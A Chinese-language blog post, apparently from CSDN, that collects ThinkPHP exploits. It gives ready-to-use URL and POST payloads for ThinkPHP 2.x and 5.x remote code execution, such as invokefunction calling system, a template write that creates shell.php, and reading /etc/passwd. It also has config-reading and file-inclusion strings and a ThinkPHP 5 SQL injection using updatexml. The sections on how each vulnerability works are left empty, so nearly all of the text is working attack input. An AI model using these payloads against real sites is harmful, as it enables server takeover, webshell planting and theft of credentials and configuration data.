1.tinkphp2.x任意代码执行漏洞
操作技巧:
payload:http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D (phpifo可以替换为其他命令)
漏洞原理:
漏洞版本:2.x
2.ThinkPHP5远程代码执行漏洞:
操作技巧:
post请求-http://192.168.80.129:8080/index.php?s=captcha
请求数据-_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /etc/passwd
payload:
5.1.x
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
5.0.x
?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件
?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
漏洞原理:
漏洞版本:5.1.x 5.0.x
3.thinkphp5sql注入:
操作技巧:
payload:http://********/index/index/index?orderby[id`|updatexml(1,concat(0x7,user(),0x7e),1)%23]=1
漏洞原理:
漏洞版本:ThinkPHP < 5.1.23
thinkphp漏洞合集
最新推荐文章于 2024-09-08 11:36:03 发布
1303

被折叠的 条评论
为什么被折叠?



